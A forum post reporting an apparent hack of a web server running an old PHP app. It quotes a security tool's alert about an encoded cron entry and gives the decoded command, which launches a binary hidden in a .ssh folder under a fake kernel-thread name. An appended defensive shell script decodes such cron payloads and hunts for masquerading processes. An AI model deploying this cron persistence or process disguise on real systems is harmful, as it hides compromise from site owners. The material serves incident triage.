Hi there,
I just had what I believe was a targeted hack attempt.
Initially, I received an email from cPFence (what would we do without it?):
`Dear Admin,
An infected cron entry was detected and removed on node1. This is a one-time alert for this user.
Details:
- Username: *********
- Site UUID: ***************
- Infected Cron Command: 0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAg.................. Daily system backup
Recommendation:
We strongly recommend that you manually inspect the site's files, plugins, and themes for any hidden or malicious content. Pay close attention to recently modified files and look for any unfamiliar additions.
- Inspect the site directory: /var/www/***********
- Review recent changes:
find /var/www/************** -type f -mtime -2 -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort
- If WordPress, check wp-content/plugins and wp-content/themes for unknown or recently changed items
- Update core, plugins, and themes, and rotate passwords for wp-admin, database, and SFTP
- Review remaining cron jobs for ********:
su - ********** -c 'crontab -l'
Best regards,
The cPFence Team`
The encoded cron entry did this:
`/usr/bin/bash -c "exec -a '[raid5wq]' '/var/www/*************/.ssh/putty/id_rsa'" \`
I also noticed extra files in the .ssh directory.
This website is running a very old PHP app called OxyClassifieds. It seems that there are numerous vulnerabilities in there.
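One way to turn the indicators in this post into a repeatable triage check, as an added example (this is not code from the post or from cPFence). It assumes the alert's cron line has the form `{ echo <base64> | base64 -d | bash; } # Daily system backup`, which the truncated entry suggests but does not show in full. The only part of the real payload the post exposes is that the visible prefix `L3Vzci9iaW4vcGtpbGwgLTAg` decodes to `/usr/bin/pkill -0 `, so `SAMPLE_CMD` below is constructed around that prefix, the `[raid5wq]` name from the post, and a hypothetical site path. The last function checks the `exec -a '[kernel-thread-name]'` trick directly: a real kernel thread has an empty cmdline and no readable `/proc/PID/exe`, while a userland binary that renamed itself has both.

```shell
#!/bin/sh
# Added example, not from the original post. Triage helpers for a base64-encoded
# cron payload and for processes masquerading as kernel threads via "exec -a".

# Constructed sample payload. Only the "/usr/bin/pkill -0 " prefix matches what the
# post's visible base64 decodes to; the rest (path, logic) is illustrative.
SAMPLE_CMD="/usr/bin/pkill -0 -f '[raid5wq]' || /usr/bin/bash -c \"exec -a '[raid5wq]' '/var/www/example.com/.ssh/putty/id_rsa'\""

# Build a sample crontab: one benign job plus one encoded job in the assumed form.
sample_crontab() {
    b64=$(printf '%s' "$SAMPLE_CMD" | base64 | tr -d '\n')
    printf '%s\n' "0 3 * * * /usr/bin/certbot renew --quiet"
    printf '0 * * * * { echo %s | base64 -d | bash; } # Daily system backup\n' "$b64"
}

# Print the decoded command of every "echo <base64>" found in the crontab on stdin.
# Use on a real box as: su - USER -c 'crontab -l' | decode_cron_payloads
decode_cron_payloads() {
    grep -oE 'echo +[A-Za-z0-9+/=]{16,}' | while read -r _ b64; do
        printf '%s' "$b64" | base64 -d 2>/dev/null
        printf '\n'
    done
}

# Name the indicators from the post that a decoded command shows: process-name
# spoofing via "exec -a", a fake kernel-thread name like "[raid5wq]", and a binary
# stored under a .ssh directory. Prints a space-separated list (empty = none).
classify_payload() {
    cmd=$1
    hits=""
    case "$cmd" in *"exec -a "*) hits="$hits exec-a" ;; esac
    printf '%s' "$cmd" | grep -q '\[[a-z0-9]*\]' && hits="$hits kthread-name"
    case "$cmd" in */.ssh/*) hits="$hits ssh-dir-binary" ;; esac
    printf '%s' "${hits# }"
}

# List PIDs whose process name looks like a kernel thread ("[name]") but which have a
# real executable behind them. Genuine kernel threads have an empty cmdline and no
# readable exe link. $1 = proc root (default /proc) so a constructed tree can be scanned.
find_fake_kthreads() {
    root=${1:-/proc}
    for d in "$root"/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        name=$(tr '\0' ' ' < "$d/cmdline" | sed 's/ *$//')
        case "$name" in
            \[*\]*)
                if exe=$(readlink "$d/exe" 2>/dev/null) && [ -n "$exe" ]; then
                    printf '%s %s -> %s\n' "${d##*/}" "$name" "$exe"
                fi ;;
        esac
    done
}

# Stand-alone run: decode the sample crontab, classify it, then scan the live /proc.
sample_crontab | decode_cron_payloads | while read -r line; do
    printf 'decoded: %s\nindicators: %s\n' "$line" "$(classify_payload "$line")"
done
find_fake_kthreads
```

On a live host, run `find_fake_kthreads` as root so every `/proc/PID/exe` link is readable; a non-root run silently skips other users' processes. A hit does not by itself prove compromise (some legitimate daemons also rename themselves), but a bracketed name backed by a file under a web root or `.ssh` directory, as in this post, is worth killing and preserving for analysis.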